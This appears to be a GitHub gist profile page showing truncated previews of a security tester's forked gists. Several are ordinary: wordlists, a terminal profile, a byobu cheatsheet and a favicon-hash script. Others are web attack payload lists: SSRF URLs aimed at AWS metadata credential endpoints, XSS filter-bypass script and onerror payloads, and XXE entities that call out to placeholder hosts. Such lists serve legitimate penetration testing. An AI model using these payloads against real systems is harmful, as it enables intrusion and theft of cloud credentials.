Skip to content

Instantly share code, notes, and snippets.

View Sy3Omda's full-sized avatar
🎯
Focusing

Emad Youssef Sy3Omda

🎯
Focusing
57 followers · 354 following
View GitHub Profile
@Sy3Omda
Sy3Omda / params.txt
Last active August 15, 2020 17:03 — forked from random-robbie/params.txt
0
1
11
12
13
14
15
16
17
2
@Sy3Omda
Sy3Omda / cloud_metadata.txt
Created June 11, 2019 07:05 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@Sy3Omda
Sy3Omda / file_extensions.txt
Created June 11, 2019 07:08 — forked from BuffaloWill/file_extensions.txt
File Extension Dictionary (decent) Bruteforcing
aw
atom
atomcat
atomsvc
ccxml
cdmia
cdmic
cdmid
cdmio
cdmiq
@Sy3Omda
Sy3Omda / content-types.txt
Created June 11, 2019 07:09 — forked from BuffaloWill/content-types.txt
Content-Type Dictionary Bruteforcing
# from https://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/conf/mime.types
application/1d-interleaved-parityfec
application/3gpdash-qoe-report+xml
application/3gpp-ims+xml
application/a2l
application/activemessage
application/alto-costmap+json
application/alto-costmapfilter+json
application/alto-directory+json
@Sy3Omda
Sy3Omda / gist:1c116f0880c00efb9c83bf3d4c9ac7fe
Created June 18, 2019 08:53 — forked from ThomasOrlita/gist:e2e4a6d72877c8c897082eefe969578a
XSS Filter Bypass List with indexes
<script\x20type="text/javascript">javascript:alert(0);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(2);</script>
<script\x09type="text/javascript">javascript:alert(3);</script>
<script\x0Ctype="text/javascript">javascript:alert(4);</script>
<script\x2Ftype="text/javascript">javascript:alert(5);</script>
<script\x0Atype="text/javascript">javascript:alert(6);</script>
'`"><\x3Cscript>javascript:alert(7)</script>
'`"><\x00script>javascript:alert(8)</script>
<img src=1 href=1 onerror="javascript:alert(9)"></img>
@Sy3Omda
Sy3Omda / cloud_metadata.txt
Created September 15, 2019 08:34 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Sy3Omda
Sy3Omda / profile.json
Created November 26, 2019 11:50 — forked from shanselman/profile.json
Windows Terminal Profile
{
"defaultProfile": "{7d04ce37-c00f-43ac-ba47-992cb1393215}",
"initialRows": 30,
"initialCols": 120,
"alwaysShowTabs": true,
"showTerminalTitleInTitlebar": true,
"experimental_showTabsInTitlebar": true,
"requestedTheme": "dark",
"profiles": [
{
@Sy3Omda
Sy3Omda / byobu_cheatsheet
Created June 8, 2020 10:05 — forked from devhero/byobu_cheatsheet
byobu cheatsheet (from F9 -> quick start guide) - http://askubuntu.com/questions/661940/i-just-dont-get-byobus-keybindings-systems-or
Byobu is a suite of enhancements to tmux, as a command line
tool providing live system status, dynamic window management,
and some convenient keybindings:
F1 * Used by X11 *
Shift-F1 Display this help
F2 Create a new window
Shift-F2 Create a horizontal split
Ctrl-F2 Create a vertical split
Ctrl-Shift-F2 Create a new session
@Sy3Omda
Sy3Omda / get-shodan-favicon-hash.py
Created July 4, 2020 07:43 — forked from yehgdotnet/get-shodan-favicon-hash.py
Get Shodan FAVICON Hash
# https://twitter.com/brsn76945860/status/1171233054951501824
pip install mmh3
-----------------------------
# python 2
import mmh3
import requests
response = requests.get('https://cybersecurity.wtf/favicon.ico')
favicon = response.content.encode('base64')
@Sy3Omda
Sy3Omda / xxe-payloads.txt
Created September 14, 2020 16:52 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y